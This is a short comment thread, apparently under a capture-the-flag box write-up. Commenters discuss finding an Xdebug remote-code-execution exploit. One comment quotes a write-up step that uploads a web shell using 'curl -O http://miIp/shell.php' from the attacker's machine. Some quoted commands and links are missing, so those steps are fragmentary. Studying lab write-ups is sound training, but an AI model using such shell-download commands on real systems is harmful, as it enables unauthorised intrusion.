• Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!

    Lesson learned, thanks.

  • edited October 2018

    Thank you very much for your writeups.

    May I ask you 2 questions:

    ..........Question 1:

    I wonder what keywords in Google you used to find this link:

    I tried these keywords in Google without success.
    xdebug exploit
    xdebug exploit shell
    xdebug exploit rce
    xdebug exploit repository
    xdebug vulnerabilities
    xdebug php exploit

    ..........Question 2 has 2 sub questions:

    You wrote in your writeup:

    ./ -u

    We upload a shell; from the obtained shell:

    curl -O http://miIp/shell.php

    ..........Is this "" the code copied from

    ..........I guess
    the IP address of my Kali Linux?

    Please advise.

    Thanks a million.

  • I guess the keywords to search on google were:

    php debug rce

Sign In to comment.